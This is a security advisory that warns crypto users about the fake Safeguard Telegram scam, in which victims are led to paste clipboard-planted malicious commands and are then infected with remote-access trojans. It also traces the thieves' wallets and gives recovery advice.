Recently, we have received many distress messages from victims related to the "fake Safeguard" scam on Telegram. As many users are not familiar with this type of attack, they often lack vigilance when encountering such scams, and both novice and experienced players are likely to fall for it. This article will delve into the attack method of this scam and provide effective prevention suggestions to help users protect their assets from loss.
Scam Analysis
This type of scam is mainly divided into two types. One is to steal the Telegram account, where the scammer induces the user to enter their phone number, verification code, or even the Two-Step Verification password to steal their Telegram account. The other is to plant a Trojan horse on the user's computer, which is a more common method recently. This article will focus on the second method.
In some highly popular token airdrop activities, when the user's FOMO emotion is at its peak, they will see the Channel interface shown in the image on Telegram and definitely click on "Tap to verify":
After clicking "Tap to verify", a fake Safeguard bot will open, which appears to be performing verification. This verification window is extremely short, giving the user a sense of urgency and forcing them to continue the operation.
Continuing to click, the result will "pretend" to show that the verification is unsuccessful, and finally, the prompt interface for the user to manually verify will appear:
The scammer has thoughtfully configured Step1, Step2, and Step3. At this point, the user's clipboard already contains malicious code. As long as the user does not actually follow these steps to operate, there will be no problem:
But if the user obediently follows these steps, the computer will be infected with a virus.
Here's another example - the attacker impersonates a KOL and uses a malicious bot to guide the user to run Powershell malicious code. The scammers create a fake KOL's X account, and then they post a Telegram link in the comments, inviting users to join the "exclusive" Telegram group to obtain investment information. For example, the comment area of @BTW0205 has a Scam account, and many users will see "exciting news" in the comments:
Then they enter the corresponding Telegram Channel and guide the user to verify.
When the user clicks to verify, a fake Safeguard appears, similar to the above process, with Step1, Step2, and Step3 to guide the verification operation.
At this point, the user's clipboard has been secretly planted with malicious code content. If the user really follows the guide to open the run box and Ctrl + V the malicious code content into the run box, the state will be as shown in the figure below, with a large blank area in front of the Telegram logo and the malicious code.
These malicious codes are usually Powershell instructions, which will silently download more complex malicious codes after execution, ultimately infecting the computer with a remote control Trojan (such as Remcos). Once the computer is controlled by the Trojan, the hacker can remotely steal the wallet files, seed phrases, private keys, passwords, and other sensitive information from the computer, and even steal the assets.
The comment area of the Ethereum Foundation account @ethereumfndn has also been polluted by this type of scam, and this scam is showing a large-scale net-casting and harvesting pattern.
The latest scam has also polluted the comment area of Trump's X account:
If you are opening it on a mobile phone, the scam will gradually obtain your Telegram permissions. If you discover it in time, you need to quickly go to Telegram settings, Privacy and Security -> Active sessions -> Terminate all other sessions, and then add or modify the Two-Step Verification.
If you are not on a Windows computer but a Mac computer, there are similar ways to induce you to infect your computer. The trick is similar. When the image below appears in Telegram, your clipboard has already been secretly planted with malicious code content.
At this point, there is no risk yet, but if you follow the given steps, the consequences shown in the image below will occur:
MistTrack Analysis
We have selected several hacker addresses and used the on-chain tracking and anti-money laundering platform MistTrack for analysis.
Solana hacker addresses:
HVJGvGZpREPQZBTScZMBMmVzwiaVNN2MfSWLgeP6CrzV
2v1DUcjyNBerUcYcmjrDZNpxfFuQ2Nj28kZ9mea3T36W
D8TnJAXML7gEzUdGhY5T7aNfQQXxfr8k5huC6s11ea5R
According to the analysis of MistTrack, the above three hacker addresses have currently earned over $1.2 million, including SOL and multiple SPL Tokens.
The hackers first convert most of the SPL Tokens into SOL:
Then they disperse the SOL to multiple addresses, and the hacker addresses also interact with platforms like Binance, Huobi, and FixedFloat:
Additionally, the address HVJGvGZpREPQZBTScZMBMmVzwiaVNN2MfSWLgeP6CrzV currently has a balance of 1,169.73 SOL and Tokens worth over $10,000.
We also analyzed one of the Ethereum hacker addresses 0x21b681c98ebc32a9c6696003fc4050f63bc8b2c6, whose first transaction was in January 2025 and involved multiple chains. The current balance is around $130,000.
This address will transfer ETH to multiple platforms such as: ChangeNOW, eXch, Cryptomus.com:
How to prevent
If your computer is infected, you need to do the following immediately:
1. Immediately transfer any wallets, funds, or assets that have been used on this computer, do not think that using a wallet with a password is safe;
2. Change the passwords or 2FA for any accounts or saved passwords in your browsers;
3. Change the passwords for any other accounts on the computer, such as Telegram.
You should assume the worst-case scenario, as your computer is compromised, and is transparent to the scammers. So think like a scammer - if you had full control of an active Web3/Crypto computer, what would you do. Finally, after backing up important data, you can reinstall the computer, and install well-known antivirus software such as AVG, Bitdefender, or Kaspersky, and do a full system scan to resolve the issue.
Summary
The fake Safeguard scam has evolved into a mature hacking attack model, from faking comments to lure victims, to implanting malware, and finally stealing assets, the entire process is hidden and efficient. As the attack methods become more sophisticated, users need to be more vigilant about various inducing links and operational steps on the internet, and can effectively prevent such scams by improving vigilance, strengthening protection, and promptly detecting and dealing with potential threats.
